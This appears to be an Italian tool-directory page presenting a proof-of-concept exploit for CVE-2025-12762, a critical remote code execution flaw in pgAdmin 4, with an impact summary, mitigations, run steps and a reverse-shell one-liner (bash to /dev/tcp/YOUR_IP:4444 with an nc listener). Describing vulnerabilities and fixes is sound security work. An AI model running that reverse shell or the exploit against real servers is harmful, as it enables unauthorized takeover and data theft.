Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-12762 — Exploit proof-of-concept per CVE-2025-12762, una RCE critica in pgAdmin 4 ≤ 9.9. Include analisi tecnica, CVSS 9.1 e reverse shell opzionale per test di penetrazione autorizzati. | Kitploit
Strumenti/GitHubGitHub/djayagit/blackash-cve-2025-12762
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

Exploit proof-of-concept per CVE-2025-12762, una RCE critica in pgAdmin 4 ≤ 9.9. Include analisi tecnica, CVSS 9.1 e reverse shell opzionale per test di penetrazione autorizzati.

Vedi Repository
79 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔐 CVE-2025-12762 — Vulnerabilità RCE Critica in pgAdmin 4

G58aQGbW0AAL8zH

🚨 Qual è il Problema?

Una vulnerabilità di Esecuzione Remota di Codice (RCE) esiste in pgAdmin 4 versioni ≤ 9.9. Gli aggressori possono eseguire comandi arbitrari sull'host quando pgAdmin è in esecuzione in modalità server e processa un dump SQL in formato PLAIN durante il ripristino.


⚙️ Dettagli Tecnici

📡 Vettore d'Attacco

  • Basato sulla rete — può essere sfruttato da remoto 🌍
  • Bassa complessità — semplice da attivare 🧩
  • Privilegi bassi richiesti — è sufficiente un accesso utente limitato 🔑
  • Nessuna interazione dell'utente — una volta attivato, nessuno deve cliccare nulla 🙅‍♂️
  • Ambito: Modificato — la compromissione può diffondersi oltre il modulo vulnerabile 🔄

🧨 Impatto

  • Riservatezza: Alta — rischio di esposizione dei dati 🔓
  • Integrità: Media/Alta — possibili modifiche non autorizzate ✏️
  • Disponibilità: Media — le operazioni possono essere interrotte ⚠️

🏷 Punteggio CVSS

🟥 9.1 / 10 — Critico


🛠 Versioni Interessate

  • pgAdmin 4 ≤ 9.9 ❗

🛡 Come Risolvere

✅ Mitigazione Primaria

⬆️ Aggiornare a pgAdmin 4 v10.0 o successiva

🚧 Se Non Puoi Aggiornare Immediatamente

  • 🔒 Limitare l'accesso al server pgAdmin
  • 📁 Consentire solo amministratori fidati a ripristinare file dump
  • 🧪 Convalidare i file dump prima del ripristino
  • 👀 Monitorare i log per attività di ripristino sospette
  • 🌐 Utilizzare regole firewall / VPN per limitare l'esposizione

📌 Perché è Importante

pgAdmin è spesso utilizzato per l'amministrazione di database PostgreSQL critici, il che significa:

  • Un aggressore che sfrutta questa vulnerabilità può prendere il controllo del server,
  • Accedere o modificare i dati,
  • O persino spostarsi più in profondità nella tua rete 🕵️‍♂️

✨ Come Eseguire (2 minuti)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

Prova del Successo

Dopo l'esecuzione, controlla:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

File esistente → Hai appena sfruttato CVE-2025-12762 per davvero.

Reverse Shell One-Liner (opzionale)

Sostituisci la riga COMMAND con:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

Poi nc -lvnp 4444 → shell interattiva completa.

Questo è l'esatto script che ricercatori, pentester e red team stanno usando in tutto il mondo a novembre 2025.

Usalo responsabilmente. Aggiorna tutto. Rimani legale.


🛡️ Disclaimer 🛡️

Questa PoC è fornita esclusivamente per test autorizzati e uso educativo.
Puoi eseguirla esclusivamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta per i test.
Qualsiasi uso non autorizzato è illegale e viola le leggi sull'abuso informatico.
Usalo responsabilmente, aggiorna immediatamente dopo i test e non prendere mai di mira sistemi senza autorizzazione.

Scarica lo strumento